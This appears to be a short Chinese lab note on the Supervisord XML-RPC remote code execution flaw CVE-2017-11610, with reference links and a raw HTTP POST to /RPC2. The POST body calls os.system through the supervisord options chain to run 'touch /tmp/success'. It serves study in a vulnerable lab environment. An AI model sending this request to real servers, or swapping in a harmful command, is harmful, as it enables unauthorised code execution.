实验环境和介绍

Supervisord 远程代码执行漏洞_视频教程_i春秋_培育信息时代的安全感! (ichunqiu.com)

参考

https://blogs.securiteam.com/index.php/archives/3348
https://www.leavesongs.com/PENETRATION/supervisord-RCE-CVE-2017-11610.html
https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610

图 0 

POST /RPC2 HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 213

supervisor.supervisord.options.warnings.linecache.os.systemtouch /tmp/success

图 1